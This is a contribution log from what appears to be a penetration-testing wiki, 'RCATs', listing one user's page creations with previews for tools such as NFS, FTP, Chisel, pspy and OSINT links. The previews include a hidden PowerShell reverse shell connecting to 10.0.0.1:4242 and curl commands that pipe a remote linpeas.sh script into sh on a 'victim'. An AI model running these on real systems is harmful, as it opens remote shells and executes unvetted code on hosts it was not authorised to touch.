Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).
- 15:13, 8 July 2023 Ali3nw3rx talk contribs created page IMAPS / POP3S (Created page with "Article for IMAPS / POP3S connections and commands https://www.atmail.com/blog/imap-101-manual-imap-sessions/") Tag: Visual edit
- 13:38, 8 July 2023 Ali3nw3rx talk contribs created page SMTP (Created page with "==COMMANDS==")
- 12:39, 8 July 2023 Ali3nw3rx talk contribs created page DNS (Created page with "==COMMAND==") Tag: Visual edit: Switched
- 12:38, 8 July 2023 Ali3nw3rx talk contribs created page NFS (Created page with "==COMMANDS== <code>showmount -e <FQDN/IP> Show available NFS shares. mount -t nfs <FQDN/IP>:/<share> ./target-NFS/ -o nolock Mount the specific NFS share.umount ./target-NFS umount ./target-NFS Unmount the specific NFS share.</code>") Tag: Visual edit: Switched
- 12:33, 8 July 2023 Ali3nw3rx talk contribs created page FTP (Created page with "-COMMANDS- ftp <FQDN/IP> Interact with the FTP service on the target. nc -nv <FQDN/IP> 21 Interact with the FTP service on the target. telnet <FQDN/IP> 21 Interact with the FTP service on the target. openssl s_client -connect <FQDN/IP>:21 -starttls ftp Interact with the FTP service on the target using encrypted connection. wget -m --no-passive ftp://anonymous:anonymous@<target> Download all available files on the target FTP server.")
- 13:52, 3 July 2023 Ali3nw3rx talk contribs uploaded File:Nmap Scan.png
- 13:52, 3 July 2023 Ali3nw3rx talk contribs created page File:Nmap Scan.png
- 13:21, 18 May 2023 Ali3nw3rx talk contribs created page Help (Created page with "'''RCAT's Help Doc'''") Tag: Visual edit
- 13:19, 18 May 2023 Ali3nw3rx talk contribs moved page Active directory to Active Directory
- 13:19, 18 May 2023 Ali3nw3rx talk contribs moved protection settings from Active directory to Active Directory (Active directory moved to Active Directory)
- 13:05, 18 May 2023 Ali3nw3rx talk contribs created page Kerberoasting (Created page with "{{Kerberoasting}}") Tag: Visual edit: Switched
- 10:14, 18 May 2023 Ali3nw3rx talk contribs protected Active directory [Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite) (hist)
- 20:40, 10 April 2023 Ali3nw3rx talk contribs protected BroScience [Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite) (hist)
- 08:42, 10 April 2023 Ali3nw3rx talk contribs created page Tmux (Created page with "Category:Tools") Tag: Visual edit: Switched
- 07:21, 10 April 2023 Ali3nw3rx talk contribs created page Vmware (Created page with "Category:Tools")
- 23:04, 18 March 2023 Ali3nw3rx talk contribs created page Powershell Lateral Movement (Created page with "category: Lateral Movement") Tag: Visual edit: Switched
- 10:42, 14 March 2023 Ali3nw3rx talk contribs created page Cobalt Strike:Host Persistence (Created page with "Category: Cobalt Strike test")
- 10:41, 14 March 2023 Ali3nw3rx talk contribs created page Cobalt Strike: Host Persistence (Created page with "Category: Cobalt Strike test") Tag: Visual edit: Switched
- 10:38, 14 March 2023 Ali3nw3rx talk contribs created page Host Persistence (Created page with "categories: cobalt strike test")
- 10:36, 14 March 2023 Ali3nw3rx talk contribs created page Category:Cobalt Strike: Persistence (Created page with "asdf") Tag: Visual edit
- 10:30, 2 March 2023 Ali3nw3rx talk contribs created page Powershell Commands (Created page with "Category:PowerShell")
- 17:58, 23 February 2023 Ali3nw3rx talk contribs created page RCATS Markdown Syntax (Created page with "==RCATS Markdown Syntax== Category:help") Tag: Visual edit: Switched
- 17:55, 23 February 2023 Ali3nw3rx talk contribs created page Editing an Existing Post (Created page with "==Editing an Existing Post== category:help")
- 17:54, 23 February 2023 Ali3nw3rx talk contribs created page Your First Post (Created page with "==Your First Post== category:help")
- 17:53, 23 February 2023 Ali3nw3rx talk contribs created page Setting Up an Account (Created page with "==Setting Up an Account== category:help")
- 17:53, 23 February 2023 Ali3nw3rx talk contribs created page How to Use RCATs (Created page with "==How to Use RCATs category:help")
- 17:52, 23 February 2023 Ali3nw3rx talk contribs created page Category:Help (Created page with "==Welcome to our Help Doc Page!==")
- 17:39, 23 February 2023 Ali3nw3rx talk contribs created page Test page (Created page with "{| class="wikitable" |+ !center|thumb|450x450px ! * This is a list * this is another spot on the list * yet another spot on the list to use ! ! |- | | | | |- | | | | |- | | | | |}") Tag: Visual edit
- 14:27, 21 February 2023 Ali3nw3rx talk contribs created page Chisel (Created page with "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. <syntaxhighlight lang=powershell> $ chisel --help Usage: chisel [command] [--help] Version: X.Y.Z Commands: server - runs chisel in server mode client - runs chisel in client mod...") Tag: Visual edit: Switched
- 13:10, 21 February 2023 Ali3nw3rx talk contribs created page Linux Smart Enumeration - LSE (Created page with "==linux-smart-enumeration== Linux enumeration tools for pentesting and CTFs This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests. Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view. Download: <syntaxhighlight lang=powershell> Use: ./lse.sh [options] OPTIONS -c Disable color -i Non interactive mode -h This help -l LEVEL...") Tag: Visual edit: Switched
- 11:25, 21 February 2023 Ali3nw3rx talk contribs created page PSPY (Created page with " pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea. The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch sho...")
- 10:04, 21 February 2023 Ali3nw3rx talk contribs created page Privilege Escalation Check List - Linux (Created page with "Category:Privilege Escalation") Tag: Visual edit: Switched
- 09:45, 21 February 2023 Ali3nw3rx talk contribs created page PEAS (Created page with "Category:Tools Category:Reconnaissance ==Latest Releases== <syntaxhighlight lang=powershell> https://github.com/carlospolop/PEASS-ng/releases/tag/20230219 </syntaxhighlight> ==Quick Start LinPeas== <syntaxhighlight lang=powershell> # From github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Local network sudo python -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl sudo nc -q 5 -lvnp 8...")
- 15:56, 5 February 2023 Ali3nw3rx talk contribs uploaded File:Subnet3.png
- 15:56, 5 February 2023 Ali3nw3rx talk contribs created page File:Subnet3.png
- 15:55, 5 February 2023 Ali3nw3rx talk contribs uploaded File:Subnet2.png
- 15:55, 5 February 2023 Ali3nw3rx talk contribs created page File:Subnet2.png
- 15:53, 5 February 2023 Ali3nw3rx talk contribs created page Subnetting (Created page with "center|frameless|1000x1000px") Tag: Visual edit
- 15:52, 5 February 2023 Ali3nw3rx talk contribs uploaded File:Subnet1.png
- 15:52, 5 February 2023 Ali3nw3rx talk contribs created page File:Subnet1.png
- 15:47, 5 February 2023 Ali3nw3rx talk contribs created page Nishang (Created page with "Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. By Nikhil Mittal Founder of Altered Security - Hands-on red team and enterprise security training!<ref>https://github.com/samratashok/nishang</ref><syntaxhighlight lang="powershell"> ## Git Repo https://github.com/samratashok/nishang </syntaxhighlight> <r...") Tag: Visual edit
- 15:32, 5 February 2023 Ali3nw3rx talk contribs created page OSINT (Created page with "Category:Reconnaissance ==Useful Links== <syntaxhighlight lang=powershell> ## Links https://osintcurio.us https://www.osint.games https://osintframework.com http://hunter.io http://pimeyes.com http://phonebook.cz http://email-checker.net http://emailhippo.com ## Plugins clearbit - company lnfo lookup # Chrome Extension ## Data Breaches https://dehashed.com https://alternativeto.net/tag/data-breach https://haveibeenpwned.com https://whatsmyname.app https://kik.m...") Tag: Visual edit: Switched
- 17:36, 1 February 2023 Ali3nw3rx talk contribs created page DS Store (Created page with "Category:Reconnaissance ==About .ds_stores== .DS_Store files contain records of the different properties (fields) of the files or directories of the directory of .DS_Store. These fields can specify things like modification dates, icons, backgrounds, comments, etc. This program parses, displays, and explains all the fields currently known in .DS_Store. (There's a lot!) <syntaxhighlight> sudo git clone https://github.com/HanwenZhu/.DS_Store-parser cd .DS_Store-parser...")
- 13:27, 28 January 2023 Ali3nw3rx talk contribs created page Category:Collection (Created blank page)
- 13:21, 28 January 2023 Ali3nw3rx talk contribs created page ALi3nW3rX Rev Shell Cheat Sheet (Created page with "category:Cheat Sheets")
- 13:18, 28 January 2023 Ali3nw3rx talk contribs created page Category:Cheat Sheets (Created page with "Drop you cheat sheet here")
- 13:15, 28 January 2023 Ali3nw3rx talk contribs deleted page Powershell Reverse Shell (content was: " ==Powershell Reverse Shells<ref>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell</ref>== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0...", and the only contributor was "Ali3nw3rx" (talk))
- 13:14, 28 January 2023 Ali3nw3rx talk contribs created page Powershell Reverse Shells (Created page with "==Powershell Reverse Shells<ref>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell</ref>== <syntaxhighlight lang="powershell"> powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName...")
- 13:13, 28 January 2023 Ali3nw3rx talk contribs created page Category:Reverse Shells (Created page with "category:Initial Access")
- 13:08, 28 January 2023 Ali3nw3rx talk contribs created page Category:Impact (Created blank page) Tag: Visual edit